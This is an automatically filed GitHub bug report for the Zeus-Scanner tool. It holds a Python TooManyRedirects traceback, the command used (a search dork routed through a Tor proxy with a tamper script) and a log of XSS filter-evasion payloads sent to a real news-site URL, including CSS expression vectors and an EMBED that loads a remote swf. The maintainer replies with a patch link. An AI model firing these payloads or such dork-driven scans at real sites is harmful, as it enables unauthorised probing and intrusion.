### ISSUE TITLE
Unhandled exception (edgSdxS)

### ISSUE THREAD

**Issue by ZeusIssueReporter** [Ekultek/Zeus-Scanner#212]
Zeus version:
`1.3.11.083e54`

Firefox version:
`(57, 0)`

Geckodriver version:
`geckodriver-v0.19.0-linux64.tar.gz`

Error info:
```Traceback (most recent call last):
  File "zeus.py", line 408, in <module>
    __run_attacks_main()
  File "zeus.py", line 305, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1008, in run_attacks
    agent=agent, tamper=tamper_script, batch=batch,
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 173, in main_xss
    result = scan_xss(url, proxy=proxy, agent=agent)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 117, in scan_xss
    xss_request = requests.get(url, proxies=config_proxy, headers=config_headers)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 640, in send
    history = [resp for resp in gen] if allow_redirects else []
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 140, in resolve_redirects
    raise TooManyRedirects('Exceeded %s redirects.' % self.max_redirects, response=resp)
TooManyRedirects: Exceeded 30 redirects.
````

Running details:
`Linux-4.10.0-40-generic-x86_64-with-Ubuntu-17.04-zesty`

Commands used:
`zeus.py -d allintitle:"Welcome to the Cyclades" --verbose --batch -x --x-forward --random-agent --proxy socks5://127.0.0.1:9050 --tamper=enclosebrackets -M -L 10`

Log file info:
```2017-12-01 15:14:57,008;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<TABLE BACKGROUND="javascript:alert('XSS')">'...
2017-12-01 15:14:57,008;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<TABLE BACKGROUND="javascript:alert('XSS')">'...
2017-12-01 15:14:57,308;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<TABLE><TD BACKGROUND="javascript:alert('XSS')">'...
2017-12-01 15:14:57,308;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<TABLE><TD BACKGROUND="javascript:alert('XSS')">'...
2017-12-01 15:14:57,832;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="background-image: url(javascript:alert('XSS'))">'...
2017-12-01 15:14:57,832;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="background-image: url(javascript:alert('XSS'))">'...
2017-12-01 15:14:58,010;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="background-image:\['0']['0']['7']['5']\['0']['0']['7']['2']\['0']['0']['6']C\['0']['0']['2']['8']'\['0']['0']['6']a\['0']['0']['6']['1']\['0']['0']['7']['6']\['0']['0']['6']['1']\['0']['0']['7']['3']\['0']['0']['6']['3']\['0']['0']['7']['2']\['0']['0']['6']['9']\['0']['0']['7']['0']\['0']['0']['7']['4']\['0']['0']['3']a\['0']['0']['6']['1']\['0']['0']['6']c\['0']['0']['6']['5']\['0']['0']['7']['2']\['0']['0']['7']['4']\['0']['0']['2']['8'].['1']['0']['2']['7']\['0']['0']['5']['8'].['1']['0']['5']['3']\['0']['0']['5']['3']\['0']['0']['2']['7']\['0']['0']['2']['9']'\['0']['0']['2']['9']">'...
2017-12-01 15:14:58,011;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="background-image:\['0']['0']['7']['5']\['0']['0']['7']['2']\['0']['0']['6']C\['0']['0']['2']['8']'\['0']['0']['6']a\['0']['0']['6']['1']\['0']['0']['7']['6']\['0']['0']['6']['1']\['0']['0']['7']['3']\['0']['0']['6']['3']\['0']['0']['7']['2']\['0']['0']['6']['9']\['0']['0']['7']['0']\['0']['0']['7']['4']\['0']['0']['3']a\['0']['0']['6']['1']\['0']['0']['6']c\['0']['0']['6']['5']\['0']['0']['7']['2']\['0']['0']['7']['4']\['0']['0']['2']['8'].['1']['0']['2']['7']\['0']['0']['5']['8'].['1']['0']['5']['3']\['0']['0']['5']['3']\['0']['0']['2']['7']\['0']['0']['2']['9']'\['0']['0']['2']['9']">'...
2017-12-01 15:14:58,409;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="width: expression(alert('XSS'))'...
2017-12-01 15:14:58,409;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<DIV STYLE="width: expression(alert('XSS'))'...
2017-12-01 15:14:58,671;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>'...
2017-12-01 15:14:58,671;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>'...
2017-12-01 15:14:58,947;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">'...
2017-12-01 15:14:58,948;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">'...
2017-12-01 15:14:59,457;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<XSS STYLE="xss:expression(alert('XSS'))">'...
2017-12-01 15:14:59,458;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<XSS STYLE="xss:expression(alert('XSS'))">'...
2017-12-01 15:14:59,876;zeus-log;INFO;trying payload '['1']['0']['1'];x&#x['2']F;*XSS*//*/*/pression(alert("XSS"))'>'...
2017-12-01 15:14:59,876;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '['1']['0']['1'];x&#x['2']F;*XSS*//*/*/pression(alert("XSS"))'>'...
2017-12-01 15:15:00,330;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>'...
2017-12-01 15:15:00,330;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>'...
2017-12-01 15:15:00,607;zeus-log;INFO;trying payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876a="get"'...
2017-12-01 15:15:00,608;zeus-log;DEBUG;host 'https://www.huffingtonpost.com/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876' does not appear to be vulnerable to XSS attacks with payload '/entry/spanish-designer-chus-bur%C3%A9s-is-welcoming-millennials_us_5a217ea1e4b05072e8b56876a="get"'...
2017-12-01 15:15:06,249;zeus-log;ERROR;[7;31;31mZeus has hit an unexpected error and cannot continue, error code 'Exceeded 30 redirects.'...
Traceback (most recent call last):
  File "zeus.py", line 408, in <module>
    __run_attacks_main()
  File "zeus.py", line 305, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1008, in run_attacks
    agent=agent, tamper=tamper_script, batch=batch,
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 173, in main_xss
    result = scan_xss(url, proxy=proxy, agent=agent)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 117, in scan_xss
    xss_request = requests.get(url, proxies=config_proxy, headers=config_headers)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 640, in send
    history = [resp for resp in gen] if allow_redirects else []
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 140, in resolve_redirects
    raise TooManyRedirects('Exceeded %s redirects.' % self.max_redirects, response=resp)
TooManyRedirects: Exceeded 30 redirects.

2017-12-01 15:15:06,609;zeus-log;INFO;[32mZeus got an unexpected error and will automatically create an issue for this error, please wait...[0m
2017-12-01 15:15:06,609;zeus-log;INFO;[32mgetting authorization...[0m
2017-12-01 15:15:06,631;zeus-log;INFO;[32mextracting traceback from log file...[0m
2017-12-01 15:15:06,632;zeus-log;INFO;[32mattempting to get firefox browser version...[0m
```

**Comment by Ekultek** [comment]
patched via https://github.com/Ekultek/Zeus-Scanner/commit/ade2d5f82c1b77fb9daa80a2a8500078a4539178
